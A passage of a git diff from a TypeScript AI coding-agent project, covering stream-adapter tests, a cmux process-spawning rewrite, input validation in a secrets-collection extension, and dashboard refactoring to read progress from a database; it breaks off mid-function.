+	test("generator exhaustion becomes an error message instead of clean completion", () => {
+		const message = makeStreamExhaustedErrorMessage("claude-sonnet-4-20250514", "partial answer");
+
+		assert.equal(message.stopReason, "error");
+		assert.equal(message.errorMessage, "stream_exhausted_without_result");
+		assert.deepEqual(message.content, [{ type: "text", text: "partial answer" }]);
+	});
+
+	test("generator exhaustion without prior text still exposes a classifiable error", () => {
+		const message = makeStreamExhaustedErrorMessage("claude-sonnet-4-20250514", "");
+
+		assert.equal(message.stopReason, "error");
+		assert.equal(message.errorMessage, "stream_exhausted_without_result");
+		assert.match(String((message.content[0] as any)?.text ?? ""), /Claude Code error: stream_exhausted_without_result/);
+	});
+});
+
+// ---------------------------------------------------------------------------
+// Bug #2859 — stateless provider regression tests
+// ---------------------------------------------------------------------------
+
+describe("stream-adapter — full context prompt (#2859)", () => {
+	test("buildPromptFromContext includes all user and assistant messages, not just the last user message", () => {
+		const context: Context = {
+			systemPrompt: "You are a helpful assistant.",
+			messages: [
+				{ role: "user", content: "What is 2+2?" } as Message,
+				{
+					role: "assistant",
+					content: [{ type: "text", text: "4" }],
+					api: "anthropic-messages",
+					provider: "claude-code",
+					model: "claude-sonnet-4-20250514",
+					usage: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0, totalTokens: 0, cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0, total: 0 } },
+					stopReason: "stop",
+					timestamp: Date.now(),
+				} as Message,
+				{ role: "user", content: "Now multiply that by 3" } as Message,
+			],
+		};
+
+		const prompt = buildPromptFromContext(context);
+
+		// Must contain content from BOTH user messages, not just the last
+		assert.ok(prompt.includes("2+2"), "prompt must include first user message");
+		assert.ok(prompt.includes("multiply"), "prompt must include second user message");
+		// Must contain assistant response for continuity
+		assert.ok(prompt.includes("4"), "prompt must include assistant reply for context");
+	});
+
+	test("buildPromptFromContext includes system prompt when present", () => {
+		const context: Context = {
+			systemPrompt: "You are a coding assistant.",
+			messages: [
+				{ role: "user", content: "Write a function" } as Message,
+			],
+		};
+
+		const prompt = buildPromptFromContext(context);
+		assert.ok(prompt.includes("coding assistant"), "prompt must include system prompt");
+	});
+
+	test("buildPromptFromContext handles array content parts in user messages", () => {
+		const context: Context = {
+			messages: [
+				{
+					role: "user",
+					content: [
+						{ type: "text", text: "First part" },
+						{ type: "text", text: "Second part" },
+					],
+				} as Message,
+				{ role: "user", content: "Follow-up" } as Message,
+			],
+		};
+
+		const prompt = buildPromptFromContext(context);
+		assert.ok(prompt.includes("First part"), "prompt must include array content parts");
+		assert.ok(prompt.includes("Second part"), "prompt must include all text parts");
+		assert.ok(prompt.includes("Follow-up"), "prompt must include follow-up message");
+	});
+
+	test("buildPromptFromContext returns empty string for empty messages", () => {
+		const context: Context = { messages: [] };
+		const prompt = buildPromptFromContext(context);
+		assert.equal(prompt, "");
+	});
+});
+
+describe("stream-adapter — session persistence (#2859)", () => {
+	test("buildSdkOptions enables persistSession by default", () => {
+		const options = buildSdkOptions("claude-sonnet-4-20250514", "test prompt");
+		assert.equal(options.persistSession, true, "persistSession must default to true");
+	});
+
+	test("buildSdkOptions sets model and prompt correctly", () => {
+		const options = buildSdkOptions("claude-sonnet-4-20250514", "hello world");
+		assert.equal(options.model, "claude-sonnet-4-20250514");
+	});
+
+	test("buildSdkOptions enables betas for sonnet models", () => {
+		const sonnetOpts = buildSdkOptions("claude-sonnet-4-20250514", "test");
+		assert.ok(
+			Array.isArray(sonnetOpts.betas) && sonnetOpts.betas.length > 0,
+			"sonnet models should have betas enabled",
+		);
+
+		const opusOpts = buildSdkOptions("claude-opus-4-20250514", "test");
+		assert.ok(
+			Array.isArray(opusOpts.betas) && opusOpts.betas.length === 0,
+			"non-sonnet models should have empty betas",
+		);
+	});
+});
+
+describe("stream-adapter — final content filtering (#3861)", () => {
+	test("buildFinalClaudeCodeContent strips intermediate tool calls from the final assistant message", () => {
+		const finalContent = buildFinalClaudeCodeContent(
+			[
+				{ type: "toolCall", id: "tc_1", name: "Read", arguments: {} },
+				{ type: "thinking", thinking: "Planning next step" },
+				{ type: "text", text: "Done." },
+			] as any,
+			"",
+			"",
+		);
+
+		assert.deepEqual(finalContent, [
+			{ type: "thinking", thinking: "Planning next step" },
+			{ type: "text", text: "Done." },
+		]);
+	});
+
+	test("buildFinalClaudeCodeContent falls back to cached text when the final turn only had tool calls", () => {
+		const finalContent = buildFinalClaudeCodeContent(
+			[
+				{ type: "toolCall", id: "tc_2", name: "Edit", arguments: { file_path: "app.ts" } },
+			] as any,
+			"",
+			"User-facing answer",
+		);
+
+		assert.deepEqual(finalContent, [{ type: "text", text: "User-facing answer" }]);
+	});
+});
+
+describe("stream-adapter — streaming content filtering follow-up (#3867)", () => {
+	function makePartial(content: AssistantMessage["content"]): AssistantMessage {
+		return {
+			role: "assistant",
+			content,
+			api: "anthropic-messages",
+			provider: "claude-code",
+			model: "claude-sonnet-4-20250514",
+			usage: {
+				input: 0,
+				output: 0,
+				cacheRead: 0,
+				cacheWrite: 0,
+				totalTokens: 0,
+				cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0, total: 0 },
+			},
+			stopReason: "stop",
+			timestamp: Date.now(),
+		};
+	}
+
+	test("sanitizeClaudeCodeStreamingEvent strips tool calls from streamed partials and remaps contentIndex", () => {
+		const event = sanitizeClaudeCodeStreamingEvent({
+			type: "text_delta",
+			contentIndex: 2,
+			delta: "Done.",
+			partial: makePartial([
+				{ type: "toolCall", id: "tc_1", name: "ToolSearch", arguments: {} },
+				{ type: "thinking", thinking: "Planning next step" },
+				{ type: "text", text: "Done." },
+			] as any),
+		});
+
+		assert.ok(event, "text events should still be forwarded");
+		assert.equal(event!.type, "text_delta");
+		assert.equal((event! as any).contentIndex, 1);
+		assert.deepEqual((event! as any).partial.content, [
+			{ type: "thinking", thinking: "Planning next step" },
+			{ type: "text", text: "Done." },
+		]);
+	});
+
+	test("sanitizeClaudeCodeStreamingEvent suppresses internal tool streaming events entirely", () => {
+		const event = sanitizeClaudeCodeStreamingEvent({
+			type: "toolcall_start",
+			contentIndex: 0,
+			partial: makePartial([
+				{ type: "toolCall", id: "tc_1", name: "Bash", arguments: {} },
+			] as any),
+		});
+
+		assert.equal(event, null);
+	});
+});
+
+describe("stream-adapter — Windows Claude path lookup (#3770)", () => {
+	test("getClaudeLookupCommand uses where on Windows", () => {
+		assert.equal(getClaudeLookupCommand("win32"), "where claude");
+	});
+
+	test("getClaudeLookupCommand uses which on non-Windows platforms", () => {
+		assert.equal(getClaudeLookupCommand("darwin"), "which claude");
+		assert.equal(getClaudeLookupCommand("linux"), "which claude");
+	});
+
+	test("parseClaudeLookupOutput keeps the first native path from multi-line lookup output", () => {
+		const output = "C:\\Users\\Binoy\\.local\\bin\\claude.exe\r\nC:\\Program Files\\Claude\\claude.exe\r\n";
+		assert.equal(parseClaudeLookupOutput(output), "C:\\Users\\Binoy\\.local\\bin\\claude.exe");
+	});
+});
diff --git a/src/resources/extensions/cmux/index.ts b/src/resources/extensions/cmux/index.ts
index 9843b710e..9c6d01819 100644
--- a/src/resources/extensions/cmux/index.ts
+++ b/src/resources/extensions/cmux/index.ts
@@ -1,12 +1,9 @@
-import { execFile, execFileSync } from "node:child_process";
+import { execFileSync, spawn } from "node:child_process";
 import { existsSync } from "node:fs";
 import { tmpdir } from "node:os";
 import { join } from "node:path";
-import { promisify } from "node:util";
 import type { GSDPreferences } from "../gsd/preferences.js";
 import type { GSDState, Phase } from "../gsd/types.js";
-
-const execFileAsync = promisify(execFile);
 const DEFAULT_SOCKET_PATH = "/tmp/cmux.sock";
 const STATUS_KEY = "gsd";
 const lastSidebarSnapshots = new Map<string, string>();
@@ -200,6 +197,7 @@ export class CmuxClient {
       return execFileSync("cmux", args, {
         encoding: "utf-8",
         timeout: 3000,
+        stdio: ["ignore", "pipe", "pipe"],
         env: process.env,
       });
     } catch {
@@ -209,16 +207,24 @@ export class CmuxClient {
 
   private async runAsync(args: string[]): Promise<string | null> {
     if (!this.canRun()) return null;
-    try {
-      const result = await execFileAsync("cmux", args, {
-        encoding: "utf-8",
-        timeout: 5000,
+    return new Promise<string | null>((resolve) => {
+      const child = spawn("cmux", args, {
+        stdio: ["ignore", "pipe", "pipe"],
         env: process.env,
       });
-      return result.stdout;
-    } catch {
-      return null;
-    }
+      const chunks: Buffer[] = [];
+      let settled = false;
+      const done = (result: string | null) => {
+        if (!settled) { settled = true; resolve(result); }
+      };
+      const timer = setTimeout(() => { child.kill(); done(null); }, 5000);
+      child.stdout!.on("data", (chunk: Buffer) => chunks.push(chunk));
+      child.on("close", (code) => {
+        clearTimeout(timer);
+        done(code === 0 ? Buffer.concat(chunks).toString("utf-8") : null);
+      });
+      child.on("error", () => { clearTimeout(timer); done(null); });
+    });
   }
 
   getCapabilities(): unknown | null {
diff --git a/src/resources/extensions/context7/extension-manifest.json b/src/resources/extensions/context7/extension-manifest.json
index e95788267..d5bf3098e 100644
--- a/src/resources/extensions/context7/extension-manifest.json
+++ b/src/resources/extensions/context7/extension-manifest.json
@@ -7,6 +7,6 @@
   "requires": { "platform": ">=2.29.0" },
   "provides": {
     "tools": ["resolve_library", "get_library_docs"],
-    "hooks": ["session_start"]
+    "hooks": ["session_start", "session_shutdown"]
   }
 }
diff --git a/src/resources/extensions/get-secrets-from-user.ts b/src/resources/extensions/get-secrets-from-user.ts
index 9ff6cbb03..a8f1cfe36 100644
--- a/src/resources/extensions/get-secrets-from-user.ts
+++ b/src/resources/extensions/get-secrets-from-user.ts
@@ -47,7 +47,24 @@ function shellEscapeSingle(value: string): string {
 	return `'${value.replace(/'/g, `'\\''`)}'`;
 }
 
+function isSafeEnvVarKey(key: string): boolean {
+	return /^[A-Za-z_][A-Za-z0-9_]*$/.test(key);
+}
+
+function isSupportedDeploymentEnvironment(env: string): boolean {
+	return env === "development" || env === "preview" || env === "production";
+}
+
+function hydrateProcessEnv(key: string, value: string): void {
+	// Make newly collected secrets immediately visible to the current session.
+	// Some extensions read process.env directly and do not reload .env on every call.
+	process.env[key] = value;
+}
+
 async function writeEnvKey(filePath: string, key: string, value: string): Promise<void> {
+	if (typeof value !== "string") {
+		throw new TypeError(`writeEnvKey expects a string value for key "${key}", got ${typeof value}`);
+	}
 	let content = "";
 	try {
 		content = await readFile(filePath, "utf8");
@@ -312,6 +329,7 @@ async function applySecrets(
 			try {
 				await writeEnvKey(opts.envFilePath, key, value);
 				applied.push(key);
+				hydrateProcessEnv(key, value);
 			} catch (err: any) {
 				errors.push(`${key}: ${err.message}`);
 			}
@@ -320,16 +338,27 @@ async function applySecrets(
 
 	if ((destination === "vercel" || destination === "convex") && opts.exec) {
 		const env = opts.environment ?? "development";
+		if (!isSupportedDeploymentEnvironment(env)) {
+			errors.push(`environment: unsupported target environment "${env}"`);
+			return { applied, errors };
+		}
 		for (const { key, value } of provided) {
+			if (!isSafeEnvVarKey(key)) {
+				errors.push(`${key}: invalid environment variable name`);
+				continue;
+			}
 			const cmd = destination === "vercel"
 				? `printf %s ${shellEscapeSingle(value)} | vercel env add ${key} ${env}`
-				: `npx convex env set ${key} ${shellEscapeSingle(value)}`;
+				: "";
 			try {
-				const result = await opts.exec("sh", ["-c", cmd]);
+				const result = destination === "vercel"
+					? await opts.exec("sh", ["-c", cmd])
+					: await opts.exec("npx", ["convex", "env", "set", key, value]);
 				if (result.code !== 0) {
 					errors.push(`${key}: ${result.stderr.slice(0, 200)}`);
 				} else {
 					applied.push(key);
+					hydrateProcessEnv(key, value);
 				}
 			} catch (err: any) {
 				errors.push(`${key}: ${err.message}`);
@@ -411,7 +440,7 @@ export async function collectSecretsFromManifest(
 	for (const { key, value } of collected) {
 		const entry = manifest.entries.find((e) => e.key === key);
 		if (entry) {
-			entry.status = value !== null ? "collected" : "skipped";
+			entry.status = value != null ? "collected" : "skipped";
 		}
 	}
 
@@ -419,14 +448,14 @@ export async function collectSecretsFromManifest(
 	await writeFile(manifestPath, formatSecretsManifest(manifest), "utf8");
 
 	// (j) Apply collected values to destination
-	const provided = collected.filter((c) => c.value !== null) as Array<{ key: string; value: string }>;
+	const provided = collected.filter((c) => c.value != null) as Array<{ key: string; value: string }>;
 	const { applied } = await applySecrets(provided, destination, {
 		envFilePath: resolve(ctx.cwd, ".env"),
 	});
 
 	const skipped = [
 		...alreadySkipped,
-		...collected.filter((c) => c.value === null).map((c) => c.key),
+		...collected.filter((c) => c.value == null).map((c) => c.key),
 	];
 
 	return { applied, skipped, existingSkipped };
@@ -497,8 +526,8 @@ export default function secureEnv(pi: ExtensionAPI) {
 				collected.push({ key: item.key, value });
 			}
 
-			const provided = collected.filter((c) => c.value !== null) as Array<{ key: string; value: string }>;
-			const skipped = collected.filter((c) => c.value === null).map((c) => c.key);
+			const provided = collected.filter((c) => c.value != null) as Array<{ key: string; value: string }>;
+			const skipped = collected.filter((c) => c.value == null).map((c) => c.key);
 
 			// Apply to destination via shared helper
 			const { applied, errors } = await applySecrets(provided, destination, {
diff --git a/src/resources/extensions/github-sync/sync.ts b/src/resources/extensions/github-sync/sync.ts
index 2fc5fac3a..fb1939f70 100644
--- a/src/resources/extensions/github-sync/sync.ts
+++ b/src/resources/extensions/github-sync/sync.ts
@@ -10,7 +10,8 @@
 
 import { existsSync, readdirSync } from "node:fs";
 import { join } from "node:path";
-import { loadFile, parseRoadmap, parsePlan, parseSummary } from "../gsd/files.js";
+import { loadFile, parseSummary } from "../gsd/files.js";
+import { parseRoadmap, parsePlan } from "../gsd/parsers-legacy.js";
 import {
   resolveMilestoneFile,
   resolveSliceFile,
diff --git a/src/resources/extensions/github-sync/tests/commit-linking.test.ts b/src/resources/extensions/github-sync/tests/commit-linking.test.ts
index 60dc2f0b5..d1d85eab3 100644
--- a/src/resources/extensions/github-sync/tests/commit-linking.test.ts
+++ b/src/resources/extensions/github-sync/tests/commit-linking.test.ts
@@ -10,7 +10,8 @@ describe("commit linking", () => {
       issueNumber: 43,
     });
     assert.ok(msg.includes("Resolves #43"), "should include Resolves trailer");
-    assert.ok(msg.startsWith("feat(S01/T02):"), "subject line unchanged");
+    assert.ok(msg.startsWith("feat:"), "subject line has no scope");
+    assert.ok(msg.includes("GSD-Task: S01/T02"), "GSD-Task trailer present");
   });
 
   it("includes both key files and Resolves #N", () => {
@@ -22,10 +23,13 @@ describe("commit linking", () => {
     });
     assert.ok(msg.includes("- src/auth.ts"), "key files present");
     assert.ok(msg.includes("Resolves #43"), "Resolves trailer present");
-    // Resolves should come after key files
+    assert.ok(msg.includes("GSD-Task: S01/T02"), "GSD-Task trailer present");
+    // GSD-Task should come after key files but before Resolves
     const keyFilesIdx = msg.indexOf("- src/auth.ts");
+    const taskIdx = msg.indexOf("GSD-Task: S01/T02");
     const resolvesIdx = msg.indexOf("Resolves #43");
-    assert.ok(resolvesIdx > keyFilesIdx, "Resolves after key files");
+    assert.ok(taskIdx > keyFilesIdx, "GSD-Task after key files");
+    assert.ok(resolvesIdx > taskIdx, "Resolves after GSD-Task");
   });
 
   it("no Resolves trailer when issueNumber is not set", () => {
@@ -34,6 +38,6 @@ describe("commit linking", () => {
       taskTitle: "implement auth",
     });
     assert.ok(!msg.includes("Resolves"), "no Resolves when no issueNumber");
-    assert.ok(!msg.includes("\n"), "no body when no issueNumber or keyFiles");
+    assert.ok(msg.includes("GSD-Task: S01/T02"), "GSD-Task trailer still present");
   });
 });
diff --git a/src/resources/extensions/google-search/extension-manifest.json b/src/resources/extensions/google-search/extension-manifest.json
index b2938627d..c4a775a4d 100644
--- a/src/resources/extensions/google-search/extension-manifest.json
+++ b/src/resources/extensions/google-search/extension-manifest.json
@@ -7,6 +7,6 @@
   "requires": { "platform": ">=2.29.0" },
   "provides": {
     "tools": ["google_search"],
-    "hooks": ["session_start"]
+    "hooks": ["session_start", "session_shutdown"]
   }
 }
diff --git a/src/resources/extensions/google-search/index.ts b/src/resources/extensions/google-search/index.ts
index 4f4f0fff6..a4f9818f4 100644
--- a/src/resources/extensions/google-search/index.ts
+++ b/src/resources/extensions/google-search/index.ts
@@ -79,7 +79,7 @@ async function searchWithOAuth(
 	signal?: AbortSignal,
 ): Promise<SearchResult> {
 	const model = process.env.GEMINI_SEARCH_MODEL || "gemini-2.5-flash";
-	const url = `https://cloudcode-pa.googleapis.com/v1internal:streamGenerateContent`;
+	const url = `https://cloudcode-pa.googleapis.com/v1internal:streamGenerateContent?alt=sse`;
 
 	const GEMINI_CLI_HEADERS = {
 	        ideType: "IDE_UNSPECIFIED",
@@ -104,6 +104,7 @@ async function searchWithOAuth(
 	                                contents: [{ parts: [{ text: query }] }],
 	                                tools: [{ googleSearch: {} }],
 	                        },
+	                        userAgent: "pi-coding-agent",
 	                }),
 	                signal,
 	        });
diff --git a/src/resources/extensions/gsd/activity-log.ts b/src/resources/extensions/gsd/activity-log.ts
index 932f28e2e..82896ea5b 100644
--- a/src/resources/extensions/gsd/activity-log.ts
+++ b/src/resources/extensions/gsd/activity-log.ts
@@ -153,6 +153,7 @@ export function pruneActivityLogs(activityDir: string, retentionDays: number): v
     const cutoff = Date.now() - retentionDays * 86_400_000;
     for (const entry of entries) {
       if (entry.seq === maxSeq) continue;  // always preserve highest-seq
+      if (retentionDays === 0) { try { unlinkSync(entry.filePath); } catch { /* skip */ } continue; }
       try {
         const mtime = statSync(entry.filePath).mtimeMs;
         if (Math.floor(mtime) <= cutoff) unlinkSync(entry.filePath);
diff --git a/src/resources/extensions/gsd/auto-artifact-paths.ts b/src/resources/extensions/gsd/auto-artifact-paths.ts
new file mode 100644
index 000000000..6e54f5b07
--- /dev/null
+++ b/src/resources/extensions/gsd/auto-artifact-paths.ts
@@ -0,0 +1,135 @@
+// GSD Auto-mode — Artifact Path Resolution
+//
+// resolveExpectedArtifactPath and diagnoseExpectedArtifact moved here from
+// auto-recovery.ts (Phase 5 dead-code cleanup). The artifact verification
+// function was removed entirely — callers now query WorkflowEngine directly.
+
+import {
+  resolveMilestonePath,
+  resolveSlicePath,
+  relMilestoneFile,
+  relSliceFile,
+  buildMilestoneFileName,
+  buildSliceFileName,
+  buildTaskFileName,
+} from "./paths.js";
+import { parseUnitId } from "./unit-id.js";
+import { join } from "node:path";
+
+/**
+ * Resolve the expected artifact for a unit to an absolute path.
+ */
+export function resolveExpectedArtifactPath(
+  unitType: string,
+  unitId: string,
+  base: string,
+): string | null {
+  const { milestone: mid, slice: sid, task: tid } = parseUnitId(unitId);
+  switch (unitType) {
+    case "discuss-milestone": {
+      const dir = resolveMilestonePath(base, mid);
+      return dir ? join(dir, buildMilestoneFileName(mid, "CONTEXT")) : null;
+    }
+    case "discuss-slice": {
+      const dir = resolveSlicePath(base, mid, sid!);
+      return dir ? join(dir, buildSliceFileName(sid!, "CONTEXT")) : null;
+    }
+    case "research-milestone": {
+      const dir = resolveMilestonePath(base, mid);
+      return dir ? join(dir, buildMilestoneFileName(mid, "RESEARCH")) : null;
+    }
+    case "plan-milestone": {
+      const dir = resolveMilestonePath(base, mid);
+      return dir ? join(dir, buildMilestoneFileName(mid, "ROADMAP")) : null;
+    }
+    case "research-slice": {
+      const dir = resolveSlicePath(base, mid, sid!);
+      return dir ? join(dir, buildSliceFileName(sid!, "RESEARCH")) : null;
+    }
+    case "plan-slice": {
+      const dir = resolveSlicePath(base, mid, sid!);
+      return dir ? join(dir, buildSliceFileName(sid!, "PLAN")) : null;
+    }
+    case "reassess-roadmap": {
+      const dir = resolveSlicePath(base, mid, sid!);
+      return dir ? join(dir, buildSliceFileName(sid!, "ASSESSMENT")) : null;
+    }
+    case "run-uat": {
+      const dir = resolveSlicePath(base, mid, sid!);
+      return dir ? join(dir, buildSliceFileName(sid!, "ASSESSMENT")) : null;
+    }
+    case "execute-task": {
+      const dir = resolveSlicePath(base, mid, sid!);
+      return dir && tid
+        ? join(dir, "tasks", buildTaskFileName(tid, "SUMMARY"))
+        : null;
+    }
+    case "complete-slice": {
+      const dir = resolveSlicePath(base, mid, sid!);
+      return dir ? join(dir, buildSliceFileName(sid!, "SUMMARY")) : null;
+    }
+    case "validate-milestone": {
+      const dir = resolveMilestonePath(base, mid);
+      return dir ? join(dir, buildMilestoneFileName(mid, "VALIDATION")) : null;
+    }
+    case "complete-milestone": {
+      const dir = resolveMilestonePath(base, mid);
+      return dir ? join(dir, buildMilestoneFileName(mid, "SUMMARY")) : null;
+    }
+    case "replan-slice": {
+      const dir = resolveSlicePath(base, mid, sid!);
+      return dir ? join(dir, buildSliceFileName(sid!, "REPLAN")) : null;
+    }
+    case "rewrite-docs":
+      return null;
+    case "gate-evaluate":
+      // Gate evaluate writes to DB quality_gates table — verified via state derivation
+      return null;
+    case "reactive-execute":
+      // Reactive execute produces multiple task summaries — verified separately
+      return null;
+    default:
+      return null;
+  }
+}
+
+export function diagnoseExpectedArtifact(
+  unitType: string,
+  unitId: string,
+  base: string,
+): string | null {
+  const { milestone: mid, slice: sid, task: tid } = parseUnitId(unitId);
+  switch (unitType) {
+    case "discuss-milestone":
+      return `${relMilestoneFile(base, mid, "CONTEXT")} (milestone context from discussion)`;
+    case "discuss-slice":
+      return `${relSliceFile(base, mid, sid!, "CONTEXT")} (slice context from discussion)`;
+    case "research-milestone":
+      return `${relMilestoneFile(base, mid, "RESEARCH")} (milestone research)`;
+    case "plan-milestone":
+      return `${relMilestoneFile(base, mid, "ROADMAP")} (milestone roadmap)`;
+    case "research-slice":
+      return `${relSliceFile(base, mid, sid!, "RESEARCH")} (slice research)`;
+    case "plan-slice":
+      return `${relSliceFile(base, mid, sid!, "PLAN")} (slice plan)`;
+    case "execute-task": {
+      return `Task ${tid} marked [x] in ${relSliceFile(base, mid, sid!, "PLAN")} + summary written`;
+    }
+    case "complete-slice":
+      return `Slice ${sid} marked [x] in ${relMilestoneFile(base, mid, "ROADMAP")} + summary + UAT written`;
+    case "replan-slice":
+      return `${relSliceFile(base, mid, sid!, "REPLAN")} + updated ${relSliceFile(base, mid, sid!, "PLAN")}`;
+    case "rewrite-docs":
+      return "Active overrides resolved in .gsd/OVERRIDES.md + plan documents updated";
+    case "reassess-roadmap":
+      return `${relSliceFile(base, mid, sid!, "ASSESSMENT")} (roadmap reassessment)`;
+    case "run-uat":
+      return `${relSliceFile(base, mid, sid!, "ASSESSMENT")} (UAT assessment result)`;
+    case "validate-milestone":
+      return `${relMilestoneFile(base, mid, "VALIDATION")} (milestone validation report)`;
+    case "complete-milestone":
+      return `${relMilestoneFile(base, mid, "SUMMARY")} (milestone summary)`;
+    default:
+      return null;
+  }
+}
diff --git a/src/resources/extensions/gsd/auto-dashboard.ts b/src/resources/extensions/gsd/auto-dashboard.ts
index 9947c81d0..e69cb78ad 100644
--- a/src/resources/extensions/gsd/auto-dashboard.ts
+++ b/src/resources/extensions/gsd/auto-dashboard.ts
@@ -11,11 +11,13 @@ import type { GSDState } from "./types.js";
 import { getCurrentBranch } from "./worktree.js";
 import { getActiveHook } from "./post-unit-hooks.js";
 import { getLedger, getProjectTotals } from "./metrics.js";
+import { getErrorMessage } from "./error-utils.js";
 import {
   resolveMilestoneFile,
   resolveSliceFile,
 } from "./paths.js";
-import { parseRoadmap, parsePlan } from "./files.js";
+import { isDbAvailable, getMilestoneSlices, getSliceTasks } from "./gsd-db.js";
+import { formatShortcut } from "./files.js";
 import { readFileSync, writeFileSync, existsSync } from "node:fs";
 import { execFileSync } from "node:child_process";
 import { truncateToWidth, visibleWidth } from "@gsd/pi-tui";
@@ -23,8 +25,19 @@ import { makeUI } from "../shared/tui.js";
 import { GLYPH, INDENT } from "../shared/mod.js";
 import { computeProgressScore } from "./progress-score.js";
 import { getActiveWorktreeName } from "./worktree-command.js";
-import { loadEffectiveGSDPreferences, getGlobalGSDPreferencesPath } from "./preferences.js";
+import {
+  getGlobalGSDPreferencesPath,
+  getProjectGSDPreferencesPath,
+  parsePreferencesMarkdown,
+} from "./preferences.js";
 import { resolveServiceTierIcon, getEffectiveServiceTier } from "./service-tier.js";
+import { parseUnitId } from "./unit-id.js";
+import {
+  formatRtkSavingsLabel,
+  getRtkSessionSavings,
+  type RtkSessionSavings,
+} from "../shared/rtk-session-stats.js";
+import { logWarning } from "./workflow-logger.js";
 
 // ─── UAT Slice Extraction ─────────────────────────────────────────────────────
 
@@ -33,8 +46,8 @@ import { resolveServiceTierIcon, getEffectiveServiceTier } from "./service-tier.
  * Returns null if the format doesn't match.
  */
 export function extractUatSliceId(unitId: string): string | null {
-  const parts = unitId.split("/");
-  if (parts.length >= 2 && parts[1]!.startsWith("S")) return parts[1]!;
+  const { slice } = parseUnitId(unitId);
+  if (slice?.startsWith("S")) return slice;
   return null;
 }
 
@@ -48,7 +61,6 @@ export interface AutoDashboardData {
   startTime: number;
   elapsed: number;
   currentUnit: { type: string; id: string; startedAt: number } | null;
-  completedUnits: { type: string; id: string; startedAt: number; finishedAt: number }[];
   basePath: string;
   /** Running cost and token totals from metrics ledger */
   totalCost: number;
@@ -59,6 +71,10 @@ export interface AutoDashboardData {
   profileDowngraded?: boolean;
   /** Number of pending captures awaiting triage (0 if none or file missing) */
   pendingCaptureCount: number;
+  /** RTK token savings for the current session, or null when unavailable. */
+  rtkSavings?: RtkSessionSavings | null;
+  /** Whether RTK is enabled via experimental.rtk preference. False when not opted in. */
+  rtkEnabled?: boolean;
   /** Cross-process: another auto-mode session detected via auto.lock (PID, startedAt) */
   remoteSession?: { pid: number; startedAt: string; unitType: string; unitId: string };
 }
@@ -68,7 +84,8 @@ export interface AutoDashboardData {
 export function unitVerb(unitType: string): string {
   if (unitType.startsWith("hook/")) return `hook: ${unitType.slice(5)}`;
   switch (unitType) {
-    case "discuss-milestone": return "discussing";
+    case "discuss-milestone":
+    case "discuss-slice": return "discussing";
     case "research-milestone":
     case "research-slice": return "researching";
     case "plan-milestone":
@@ -87,7 +104,8 @@ export function unitVerb(unitType: string): string {
 export function unitPhaseLabel(unitType: string): string {
   if (unitType.startsWith("hook/")) return "HOOK";
   switch (unitType) {
-    case "discuss-milestone": return "DISCUSS";
+    case "discuss-milestone":
+    case "discuss-slice": return "DISCUSS";
     case "research-milestone": return "RESEARCH";
     case "research-slice": return "RESEARCH";
     case "plan-milestone": return "PLAN";
@@ -114,6 +132,7 @@ function peekNext(unitType: string, state: GSDState): string {
   if (unitType.startsWith("hook/")) return `continue ${sid}`;
   switch (unitType) {
     case "discuss-milestone": return "research or plan milestone";
+    case "discuss-slice": return "plan slice";
     case "research-milestone": return "plan milestone roadmap";
     case "plan-milestone": return "plan or execute first slice";
     case "research-slice": return `plan ${sid}`;
@@ -152,6 +171,8 @@ export function describeNextUnit(state: GSDState): { label: string; description:
       return { label: `Replan ${sid}: ${sTitle}`, description: "Blocker found — replan the slice." };
     case "completing-milestone":
       return { label: "Complete milestone", description: "Write milestone summary." };
+    case "evaluating-gates":
+      return { label: `Evaluate gates for ${sid}: ${sTitle}`, description: "Parallel quality gate assessment before execution." };
     default:
       return { label: "Continue", description: "Execute the next step." };
   }
@@ -248,39 +269,45 @@ let cachedSliceProgress: {
 
 export function updateSliceProgressCache(base: string, mid: string, activeSid?: string): void {
   try {
-    const roadmapFile = resolveMilestoneFile(base, mid, "ROADMAP");
-    if (!roadmapFile) return;
-    const content = readFileSync(roadmapFile, "utf-8");
-    const roadmap = parseRoadmap(content);
+    // Normalize slices: prefer DB, fall back to parser
+    type NormSlice = { id: string; done: boolean; title: string };
+    let normSlices: NormSlice[];
+    if (isDbAvailable()) {
+      normSlices = getMilestoneSlices(mid).map(s => ({ id: s.id, done: s.status === "complete", title: s.title }));
+    } else {
+      normSlices = [];
+    }
 
     let activeSliceTasks: { done: number; total: number } | null = null;
     let taskDetails: CachedTaskDetail[] | null = null;
     if (activeSid) {
       try {
-        const planFile = resolveSliceFile(base, mid, activeSid, "PLAN");
-        if (planFile && existsSync(planFile)) {
-          const planContent = readFileSync(planFile, "utf-8");
-          const plan = parsePlan(planContent);
-          activeSliceTasks = {
-            done: plan.tasks.filter(t => t.done).length,
-            total: plan.tasks.length,
-          };
-          taskDetails = plan.tasks.map(t => ({ id: t.id, title: t.title, done: t.done }));
+        if (isDbAvailable()) {
+          const dbTasks = getSliceTasks(mid, activeSid);
+          if (dbTasks.length > 0) {
+            activeSliceTasks = {
+              done: dbTasks.filter(t => t.status === "complete" || t.status === "done").length,
+              total: dbTasks.length,
+            };
+            taskDetails = dbTasks.map(t => ({ id: t.id, title: t.title, done: t.status === "complete" || t.status === "done" }));
+          }
         }
-      } catch {
+      } catch (err) {
         // Non-fatal — just omit task count
+        logWarning("dashboard", `operation failed: ${err instanceof Error ? err.message : String(err)}`);
       }
     }
 
     cachedSliceProgress = {
-      done: roadmap.slices.filter(s => s.done).length,
-      total: roadmap.slices.length,
+      done: normSlices.filter(s => s.done).length,
+      total: normSlices.length,
       milestoneId: mid,
       activeSliceTasks,
       taskDetails,
     };
-  } catch {
+  } catch (err) {
     // Non-fatal — widget just won't show progress bar
+    logWarning("dashboard", `operation failed: ${err instanceof Error ? err.message : String(err)}`);
   }
 }
 
@@ -314,8 +341,9 @@ function refreshLastCommit(basePath: string): void {
       };
     }
     lastCommitFetchedAt = Date.now();
-  } catch {
+  } catch (err) {
     // Non-fatal — just skip last commit display
+    logWarning("dashboard", `operation failed: ${err instanceof Error ? err.message : String(err)}`);
   }
 }
 
@@ -347,24 +375,74 @@ export type WidgetMode = "full" | "small" | "min" | "off";
 const WIDGET_MODES: WidgetMode[] = ["full", "small", "min", "off"];
 let widgetMode: WidgetMode = "full";
 let widgetModeInitialized = false;
+let widgetModePreferencePath: string | null = null;
+
+function safeReadTextFile(path: string): string | null {
+  try {
+    if (!existsSync(path)) return null;
+    return readFileSync(path, "utf-8");
+  } catch {
+    return null;
+  }
+}
+
+function readWidgetModeFromFile(path: string): WidgetMode | undefined {
